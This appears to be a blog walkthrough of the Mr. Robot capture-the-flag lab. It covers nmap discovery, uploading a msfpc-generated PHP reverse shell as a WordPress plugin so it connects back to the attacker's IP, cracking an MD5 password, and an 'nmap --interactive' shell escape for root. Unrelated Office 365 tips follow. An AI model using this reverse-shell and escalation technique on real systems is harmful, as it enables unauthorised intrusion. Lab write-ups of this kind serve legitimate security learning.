I have no knowledge of my target machine (Mr. Robot) IP Address, so let me begin running nmap tool. Of course, you can also use other network discovery tool to scan your network. I prefer nmap tool, it is available to my pentest machine.

Port 80 and 443 are interesting ports to start poking around. Let's see what's on this website. I'm calling firefox program direct from the command prompt, of course you can simply click on the Firefox icon and enter the IP Address of the web server. It's cool to use CLI to run a command.

root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/

The website started loading a javascript, looks like loading a linux environment.

Opening the source code, got this fancy "Your are not alone".

Checking to see if I can use any of this information to hack Mr.Robot box.

I have to cancel it. I think I have enough information to start digging. There are so much information from this dir results. Getting to know of some sub-folders e.g. /admin, /blog, /license, /phyadmin, /wp-admin, /wp-login, /wp-config, etc. I think Mr.Robot box website is using a WordPress content management system. Nice.

Checking the following sub-folder.

root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/license

A webpage with this content "what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?"

Checking the user, "elliot" username is also the Administrator. Jackpot! And another user micho05654 role as subcriber. I will ignore this subscriber user, and focus to elliot as administrator.

Now, I can control this box from here. Exploiting the WordPress CMS since I have an Administrator rights through a reverse shell. Let Kali virtual machine do the work for us. Click on Applications, Exploitation Tools, then click MSF Payload. It will open the MSFVenom Payload Creator in a new terminal window. I run the command below.

root@kali:~# msfpc php 192.168.159.131 443 msf reverse stageless tcp

This command interpret to run msfpc payload create using type php, the IP address e.g. 192.168.159.131 of the attacker using port 433, using msf for cross platform shell gaining full power of metasploit, reverse to make the target connect back to the attacker in a complete stand alone payload (stageless), using tcp standard method of connecting back. I hope that make sense to you, otherwise type --help for more details.

The MSFVenom Payload Creator also provided a website that I can use to exploit my target e.g. python -m SimpleHTTPServer 8080. But in this scenario, I will not use it because I already have administrator access to the WordPress site. All I need to do is install my payload through WordPress as plugin. At this point, I can create havoc to the WordPress installation by deleting contents but the main goal is to own the box (pwn to root or pwn 2 r00t).

I will edit the php file with additional information so I can use it as WordPress plugin. Here's the updated php file.

The payload is now ready. I can use the zip file to upload as plugin in WordPress management console. Let's go back to the WordPress admin page. In Plugin, click add new plugin, then upload the zip file. Browse the zip file, click Install Now. Wait to complete the upload.

I've already started the listening machine (above), so all I need to do is click Activate Plugin to create the reverse access. When I check my listening machine, I see our session.

-K Terminate all sessions-c <opt> Run a command on the session given with -i, or all-h Help banner-i <opt> Interact with the supplied session ID-k <opt> Terminate sessions by session ID and/or range-l List all active sessions-q Quiet mode-r Reset the ring buffer for the session given with -i, or all-s <opt> Run a script on the session given with -i, or all-t <opt> Set a response timeout (default: 15)-u <opt> Upgrade a shell to a meterpreter session on many platforms-v List sessions in verbose mode-x Show extended information in the session table

The "robot:c3fcd3d76192e4007dfb496cca67e13b" stands for username:password. I've used online MD5 decryter tool (hashkiller.co.uk) to produce the value of "c3fcd3d76192e4007dfb496cca67e13b" to "abcdefghijklmnopqrstuvwxyz". Wow! the password is so basic. If I run a password cracker earlier, I'm sure I can get this password in under 2 minutes. Anyway, let me login to Mr.Robot box using this username (robot) and password (abcdefghijklmnopqrstuvwxyz).

Successfully login as robot and (abcdefghijklmnopqrstuvwxyz). Run ls command to check directory listing.

Run "cat key-2-of-3.txt" to view the file.

Check if I can "ls /root"

Oops ... it seems more research for me to get the root access.

After long hours of research and reading other penetration testing website/blogs...

I checked Mr.Robot box nmap version.

I can use "nmap --interactive" using !bash to runs shell command.

No luck.

Now, trying !sh to runs shell command. Type "exit" to get out of bash command.

Comments

Post a Comment

Popular Posts

When you create a meeting schedule for number of days, you will see an error "This resource doesn't accept meetings longer than 1440 minutes". By default the mailbox or room was set for a maximum limit of 1440 minutes.

Here's how you can disable this limit.Login to the Office 365 Administration ConsoleIn Microsoft Office 365 Exchange, click on Manage.In Manage My Orgnization, click the drop down arrow, and click on Select on Another User. This will prompt you to select the mailbox or room to manage.Select a Mailbox or Room, click OK.In Option, click on Settings.In Scheduling Options, un-check the "Limit meeting duration", then click on Save.
That's all. You can now schedule a meeting or reserve a room for number of days.

Hope this help you.

If this helped you, please take the time to share this post by sharing using Google+, Facebook, Twitter, or LinkedIn

I've searched the Internet if someone successfully use the Office365 Microsoft Exchange Online without the use of TLS and SMTP Authentication. I found nothing, so I've decided to write this article so other administrators will benefit and save time. Hopefully give me credit of saving their precious time :)

Office365 (Microsoft Exchange Online) a cloud based email powered by Microsoft Exchange Server with running latest version. SMTP Authentication and TLS protocol are required for your printer to scan and email the result to your corporate intended recipients.

I've tested the SMTP Authentication and TLS settings using Toshiba eStudio printers, and works like a charm. It took a while to configure but it works. See the captured configuration.

I enabled SMTP Client with all certificate without CA, the SSL/TLS as STARTTLS (this is the key to make scan to email using Office365 to work).